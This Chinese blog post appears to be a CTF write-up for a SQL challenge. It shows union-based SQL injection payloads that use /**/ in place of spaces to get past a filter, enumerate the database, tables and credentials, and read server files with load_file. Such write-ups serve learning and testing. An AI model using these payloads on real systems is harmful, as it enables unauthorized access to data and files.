某道sql

最新推荐文章于 2024-11-12 14:54:23 发布
最新推荐文章于 2024-11-12 14:54:23 发布
阅读量214 收藏 4
点赞数 7
分类专栏: sql注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meiyouis/article/details/138584687
版权

打开题目,出现如下界面,get传参c,sleep($c)会使界面sleep传入的c的时间,并且发现,在case 3下面并没有break来终止case,而是会接着执行case 6000000

所以我们直接传入c=3

得到信息,打开该文件,发现有一个登录框,但是登录框的参数会传入get参数qurry,尝试注入

在qurry处传入-1/**/union/**/select /**/database()此处过滤了空格

得到数据为web,接着在qurry处传入下面的注入语句来获取表名   -1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database

在qurry处输入如下sql语句来获取字段-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/conte

但是字段里面并没有爆出flag,但是一直出现secret,猜测flag在secret.php文件中,可以使用mysql中的load_flie(‘‘)来读取文件,在qurry处传入,来读取文件-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

打开f12,网页源码显示real……..

传入-1/**/union/**/select/**/load_file('/real_flag_is_here')来读取文件

林如海.
关注
专栏目录
20道Hive SQL经典训练提升题
击水三千里的专栏
08-01 2669
20道经典hive sql基础面试题
Elasticsearch高级查询
weixin_34356555的博客
03-29 91
2019独角兽企业重金招聘Python工程师标准>>> ...
基础篇:数据库 SQL 入门教程
热门推荐
LuciferLiu_DBA
09-12 37万+
超全SQL教程,收藏就完事了!
对某私服页游的SQL注入安全测试
qq_38431115的博客
10-19 1094
本次测试可以成功的原因,主要在于该站点未开启 WAF 或配置不当。一般情况下的 WAF 可防止大部SQL与XSS注入。
SQL Server简介
专研前端,探索后端
11-15 9517
SQL Server简介,SQL Server安装,node.js+SQL Server实现分库分表查询数据业务
LeetCode刷题100道,让你滚瓜烂熟拿下SQL
IT邦德
05-16 4万+
SQL每个人都要用,但是用来衡量产出的并不是SQL本身,你需要用这个工具,去创造其它的价值。
数据库整理+SQL笔试2道
qq_41022866的博客
09-16 1308
数据库问题 Mysql与Oracle区别: Oracle是大型数据库,而Mysql是中小型数据库, Mysql是开源的,而Oracle价格非常高, Oracle占内存大, 单引号的处理 MYSQL里可以用双引号包起字符串, ORACLE里只可以用单引号包起字符串。 翻页的SQL语句的处理 MYSQL处理翻页的SQL语句比较简单,用LIMIT 开始位置, 记录个数; ORACLE每个结果集只有一个ROWNUM字段标明它的位置, 并且只能用ROWNUM<100, 不能用ROWNUM>80。 日期字段
HIVE SQL 优化
weixin_46010244的博客
10-16 1341
因为count distinct操作需要用一个Reduce Task来完成,这一个Reduce需要处理的数据量太大,就会导致整个Job很难完成,一般count distinct使用先group by再count的方式替换,虽然会多用一个Job来完成,但在数据量大的情况下,这个绝对是值得的。数据倾斜的原理都知道,就是某一个或几个key占据了整个数据的90%,这样整个任务的效率都会被这个key的处理拖慢,同时也可能会因为相同的key会聚合到一起造成内存溢出。其中在开发过程中主要涉及到的可能是SQL优化这块。
面试 SQL整理 常见的SQL面试题:经典50题
sh_c1314
09-13 26万+
目录 ​ SQL基础知识整理: 常见的SQL面试题:经典50题 三、50道面试题 2.汇总统计分组分析 3.复杂查询 sql面试题:topN问题 4.多表查询 【面试题类型总结】这类题目属于行列如何互换,解题思路如下: 其他面试题: SQL基础知识整理: select 查询结果 如:[学号,平均成绩:组函数avg(成绩)]from 从哪张表中查找数...
某互联网公司针对初级Java开发的几道Sql笔试题(看完保证不亏 )
我是臭鱼阿祥
03-25 2032
实不相瞒,我就是题目中所说的初级开发,在曲折的面试道路上,被各大互联网公司的笔试题吊打。所以,我就整了一个最经典的学生成绩表sql练习,保证你看完,有所收获。 下面是三张表的创表语句,供你们快速练习: Student表: CREATE TABLE `student` ( `sno` varchar(10) NOT NULL, `sname` varchar(10) DEFAULT NULL, `ssex` varchar(10) DEFAULT NULL, `sage` int(5
SQL语句50道练习题.docx
07-15
这份"SQL语句50道练习题"文档提供了一个全面的学习平台,涵盖了多种不同难度的题目,旨在帮助初学者逐步提升技能,同时也适合有一定经验的数据库用户进行巩固。通过解决这些问题,不仅可以深化对SQL的理解,还能为...
50道sql练习含答案.docx
07-10
查询“某1”课程比“某2”课程成绩高的所有学生的学号。 **SQL代码示例**: ```sql SELECT a.sid FROM (SELECT sid, score FROM SC WHERE cid = 1) a, (SELECT sid, score FROM SC WHERE cid = 3) b WHERE a.score...
SQL-Server笔试题含答案
03-05
总共包括13道笔试题,涵盖了SQL Server中的多对多映射关系、事务、视图、局部变量、存储过程、索引等知识点。 1. SQL Server中,下面的映射关系属于“多对多”的是( )。 这个问题考察了SQL Server中的关系类型。...
如何在Linux中使用Cron定时执行SQL任务
Mr_Wanter
11-08 607
linux crontab 定时执行sql脚本。
SQL面试题——奔驰面试题
最新发布
11-12 42
我们上报上来的数据包含当前的驾驶模式和当前时间戳,我们可以把下次上报上来的时间减去当前时间的差作为这个驾驶模式的形式时间,很多人可能会说要不要判断下次上来的驾驶模式是不是和当前的相当呀。如果相等作为条件,SPORT 的驾驶时长就是TS3-TS1,如果没有这个条件SPORT 的驾驶时长就是TS4-TS1。那这个问题就很简单了,我们获取下一次上报的时间和当前时间做差,当成当前驾驶模式的形式时间。前面我们已经有了每种驾驶模式的驾驶时间,我们只需要按照驾驶时间排序即可。这两个放在一起的话,我们可以这样写。
PostgreSQL 表文件损坏异常
云端的博客
11-09 165
PostgreSQL 表文件损坏异常
[极客大挑战 2019]LoveSQL 1
2301_80148821的博客
11-08 780
又是一道SQL题,还和上面Easy_SQL是一个系列的题。
sql server启用远程连接与修改默认端口
qtvb1987的专栏
11-11 201
SQL SERVER安装目录下,C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe添加到允许的列表中。点击SQL Server 服务选项,确定SQL Server是正在运行的。三,SQL Server配置管理器,七,测试本地数据库连接服务器数据库。五,入站规则 添加你开放的端口。四,手动修改数据库的连接端口。二,sa账号状态属性启用。3)客户端IP改为一致。六,允许应用通过防火墙。
pandas的to_sql方法中使用if_exists=‘replace‘
weixin_73060959的博客
11-12 190
选择if_exists参数的值取决于你的具体需求。如果你需要保留现有数据并添加新数据,使用append。如果你需要替换现有数据,使用replace,但要小心数据丢失和性能问题。如果只是想检查表是否存在而不进行操作,使用fail。
MySQL面试必备:50道SQL试题解析
"这篇文档包含了50道关于SQL的面试题目,主要针对MySQL数据库,用于测试和提升面试者的SQL查询和操作能力。题目涉及到的数据表包括`teacher`和`student`,分别代表教师和学生的信息。`teacher`表包含教师ID(t_id)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值